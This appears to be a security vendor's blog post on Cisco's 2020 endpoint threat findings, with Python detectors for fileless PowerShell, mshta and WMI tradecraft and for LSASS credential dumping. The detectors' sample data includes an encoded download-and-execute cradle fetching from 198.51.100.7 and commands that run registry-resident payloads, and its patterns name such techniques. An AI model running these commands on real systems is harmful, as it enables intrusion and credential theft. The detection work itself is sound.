Companies have suffered a growing barrage of high-profile cyberattacks over the last decade. Attackers have grown more sophisticated and creative, and the expansion of endpoints has not helped matters: the ever-growing internet of things and the globalization of enterprises mean there are more potential attack vectors than ever. As a result, cybercriminals increasingly see corporate endpoints as easy prey.
An understanding of the threat landscape is crucial for dealing with the most prominent threats efficiently.
If you learn that adversaries have got hold of the data you are protecting, whether customer, proprietary, or other sensitive information, contact LIFARS immediately.
A new Cisco report, based on the MITRE ATT&CK knowledge base, highlights trends in how attacks against corporate endpoints are carried out and suggests a shift in attacker tactics.
Fileless attacks were the most prominent attack vector used against corporate entities in the first half of 2020, making up almost a third of all IoCs (indicators of compromise) observed on corporate endpoints. They have become popular because they do not drop a malicious executable on disk: the payload lives in memory, in the registry, or in scripts run by built-in interpreters, which makes tracing and detection much harder. They also usually piggyback on legitimate system tools and services, which gives them powerful capabilities and high privileges.
PowerShell- and WMI-based execution, registry tampering, in-memory execution, and remote logins are the most common techniques, and Kovter, Poweliks, Divergent, and LemonDuck are among the most frequently spotted threats.
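To make these techniques concrete, here is an added example (not code from the Cisco report, nor from LIFARS) of the kind of triage logic a detection engineer writes over process-creation telemetry such as Sysmon Event ID 1 or Windows 4688 fields. It decodes -EncodedCommand blobs so that the content patterns inspect what PowerShell will actually run, and scores indicators of hidden-window and policy-bypass launches, download cradles and in-memory execution, WMI execution, and script hosts reading their payload back out of the registry in the style of Kovter and Poweliks. The sample events, the indicator weights and threshold, the parent and script-host lists, and the 198.51.100.7 address are constructed assumptions for illustration.

```python
"""Heuristic triage of process-creation events for fileless tradecraft.
Added example, not code from the Cisco report or from LIFARS. The events,
indicator weights and threshold are constructed assumptions for illustration."""
import base64
import re

# -EncodedCommand in its common spellings (PowerShell accepts any unambiguous
# prefix) followed by a base64 blob. Assumption: a real blob is at least 16
# characters, which keeps short flags such as "-ep bypass" from matching.
ENC_RE = re.compile(r"(?i)(?<!\S)-e(?:n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Indicator name -> (pattern searched in the effective command text, weight).
INDICATORS = {
    "hidden_window":      (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    "policy_bypass":      (re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"), 1),
    "download_cradle":    (re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer"), 3),
    "in_memory_exec":     (re.compile(r"(?i)\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load"), 3),
    # Script host reading its payload back out of the registry (Kovter/Poweliks style).
    "registry_payload":   (re.compile(r"(?i)(?:RegRead|Get-ItemProperty|\bgp\b).*?(?:HKCU|HKLM|HKEY_)"), 3),
    "inline_script_host": (re.compile(r"(?i)\bmshta(?:\.exe)?\s+(?:javascript|vbscript):"), 3),
    "wmi_exec":           (re.compile(r"(?i)Invoke-WmiMethod|Invoke-CimMethod|\bwmic\b.*process\s+call\s+create"), 2),
}
# Assumption: an Office application launching a script host is itself notable.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or undecodable."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Score one process-creation event and return the indicators that fired."""
    cmdline = event["cmdline"]
    hits = {}
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits["encoded_command"] = 2
        # Swap the base64 blob for the decoded script so the content patterns
        # see what PowerShell will actually execute.
        text = ENC_RE.sub(" ", cmdline) + "\n" + decoded
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(text):
            hits[name] = weight
    if event["parent"].lower() in OFFICE_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        hits["office_spawned_script_host"] = 3
    return {"pid": event["pid"], "image": event["image"],
            "score": sum(hits.values()), "indicators": sorted(hits)}


def triage(events, threshold=5):
    """Return the analyses at or above the alert threshold, highest score first."""
    results = [analyze(event) for event in events]
    return sorted((r for r in results if r["score"] >= threshold), key=lambda r: -r["score"])


def _encode(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"pid": 4120, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem C:\logs"},
    {"pid": 4188, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"pid": 4222, "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": r'mshta.exe javascript:eval(new ActiveXObject("WScript.Shell").RegRead("HKCU\Software\Vendor\Blob"))'},
    {"pid": 4300, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r'''powershell.exe -w hidden -c "IEX (gp 'HKCU:\Software\Vendor').Blob"'''},
    {"pid": 4344, "parent": "svchost.exe", "image": "wmiprvse.exe",
     "cmdline": "wmiprvse.exe -secured -Embedding"},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(f"pid {result['pid']} {result['image']}: score {result['score']} {result['indicators']}")
```

Run against the constructed events, the benign directory listing and the WMI provider host score 0, while the Office-spawned encoded download cradle, the registry-resident PowerShell payload, and the mshta registry reader all clear the threshold. The weights are deliberately simple; in production they would be tuned against the organization's own baseline of legitimate PowerShell usage.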
Dual-use tools (24%) are not far behind fileless attacks and pose a similar difficulty in identifying an IoC. Dual-use tools are used by professionals for penetration testing and non-malicious training, so they are regarded as "legitimate" in certain contexts. However, the same capabilities make them equally useful to attackers, especially as they are freely available.
Metasploit, PowerShell Empire, Cobalt Strike, and PowerSploit are some of the tools highlighted by the Cisco report. If these tools are not part of your security ecosystem or are not currently in use, any sign of them on an endpoint is suspicious by definition, which makes spotting incidents easier.
Credential dumping attacks
Credential dumping, the third most prominent IoC (21%), is another form of dual-use attack. It is sometimes confused with credential stuffing, which is a different technique: replaying username and password pairs leaked elsewhere. Using tools like Mimikatz, attackers scrape login credentials from the memory of compromised endpoints, typically the LSASS process, and then exploit them as a further attack vector by impersonating authorized users with valid credentials.
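As an added example (not code from the Cisco report or from LIFARS) of detecting this class of IoC, the script below inspects Sysmon Event ID 10 (ProcessAccess) records for handles opened on lsass.exe with memory-read rights, the access that Mimikatz-style scrapers and MiniDump-based dumpers need, and applies the point made about dual-use tools above: sources that are not on the organization's list of authorized tooling are alerted on. The one-line record format, the sample records, the paths and the allowlist are constructed assumptions; the access-right values are the documented Windows PROCESS_* constants.

```python
"""Flag credential-dumping attempts against LSASS in Sysmon Event ID 10 records.
Added example, not code from the Cisco report or from LIFARS. The record format,
sample records and allowlist are constructed assumptions for illustration."""
import re

# Windows process access rights relevant to reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040

# Rights that allow reading LSASS memory directly or through a duplicated
# handle. 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ) and
# 0x1410 are the masks commonly seen from Mimikatz.
DUMP_CAPABLE = PROCESS_VM_READ | PROCESS_DUP_HANDLE

# DLLs that implement MiniDumpWriteDump; their presence in the call trace means
# the source is writing a memory dump (procdump, comsvcs.dll MiniDump, ...).
DUMP_MODULES = ("dbghelp.dll", "dbgcore.dll", "comsvcs.dll")

# Assumption: processes allowed to open LSASS with read rights on this fleet.
# Keep the list short and tied to the tools you actually run; anything else
# opening LSASS with these rights deserves a look.
ALLOWED_SOURCES = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed one-line rendering of the Sysmon fields this example needs:
# "Key=Value; Key=Value; ...". CallTrace frames are separated by "|" as in Sysmon.
FIELD_RE = re.compile(r"(\w+)=([^;]*)")


def parse_record(line):
    """Parse one 'Key=Value; Key=Value' record into a dict of stripped strings."""
    return {key: value.strip() for key, value in FIELD_RE.findall(line)}


def classify(record):
    """Return (verdict, reasons) for one ProcessAccess record.

    verdict is one of: ignore (target is not LSASS), benign (no memory-read
    rights and no dump module in the call trace), allowlisted, alert.
    """
    target = record.get("TargetImage", "").lower()
    if not target.endswith(r"\lsass.exe"):
        return "ignore", []
    source = record.get("SourceImage", "").lower()
    mask = int(record.get("GrantedAccess", "0"), 16)
    calltrace = record.get("CallTrace", "").lower()
    reasons = []
    if mask & DUMP_CAPABLE:
        reasons.append(f"GrantedAccess 0x{mask:x} includes VM_READ or DUP_HANDLE")
    modules = [m for m in DUMP_MODULES if m in calltrace]
    if modules:
        reasons.append("call trace passes through " + ", ".join(modules))
    if not reasons:
        return "benign", []
    if source in ALLOWED_SOURCES:
        return "allowlisted", reasons
    return "alert", reasons


def scan(lines):
    """Return [(source image, reasons)] for every record that warrants an alert."""
    alerts = []
    for line in lines:
        record = parse_record(line)
        verdict, reasons = classify(record)
        if verdict == "alert":
            alerts.append((record["SourceImage"], reasons))
    return alerts


SAMPLE_RECORDS = [  # constructed, not real telemetry
    r"SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe; TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1010; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234",
    r"SourceImage=C:\Users\bob\AppData\Local\Temp\mimikatz.exe; TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1010; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\KERNELBASE.dll+2f5b6",
    r"SourceImage=C:\Windows\System32\rundll32.exe; TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1FFFFF; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\comsvcs.dll+1a2b3",
    r"SourceImage=C:\Windows\System32\svchost.exe; TargetImage=C:\Windows\system32\lsass.exe; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234",
    r"SourceImage=C:\Windows\System32\notepad.exe; TargetImage=C:\Windows\System32\conhost.exe; GrantedAccess=0x1FFFFF; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234",
]

if __name__ == "__main__":
    for source, reasons in scan(SAMPLE_RECORDS):
        print(f"ALERT {source}: {'; '.join(reasons)}")
```

On the constructed records the security agent is allowlisted, the query-only svchost access is benign, and both the Mimikatz binary in a user's Temp directory and the rundll32 instance dumping LSASS through comsvcs.dll raise alerts. The second case matters because it uses only built-in Windows components, which is exactly the kind of dual-use activity that an allowlist of authorized tooling helps surface.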
APT techniques becoming more common
Another huge concern for corporations as well as SMEs is the growing tendency towards APT (advanced persistent threat) attacks. Conventionally, most attacks against businesses were focused on quick in-and-out tactics for short-term financial gain. However, attackers are increasingly using persistent methods of compromise, lying in wait for lucrative opportunities or to cause maximal damage.
This shift is attributed to both unintentional and intentional leaking of digital espionage tooling from nation-state actors to cybercriminals. Countries such as Russia and North Korea have long been suspected of this kind of state-sanctioned cybercrime. It is also natural that, over time, criminal groups simply acquire the advanced tooling these attacks require.
The attack methods mentioned above can be used as vectors to initiate a prolonged APT attack. Fileless attacks, especially, are well-suited to this type of infiltration because they confound typical detection practices.
Amid the flood of reports about malware such as Trojans, ransomware, and worms, for example the unforgettable global wave of panic sown by the WannaCry ransomware attack in 2017, these techniques often fly under the radar of public awareness. Yet these three vectors alone comprised 75% of all IoCs in the first half of 2020.
This illustrates that guarding corporate endpoints is an ongoing process that demands constant evolution and refocusing of effort. Just like cybercriminals, corporate security teams need to keep adapting to resist the latest trends.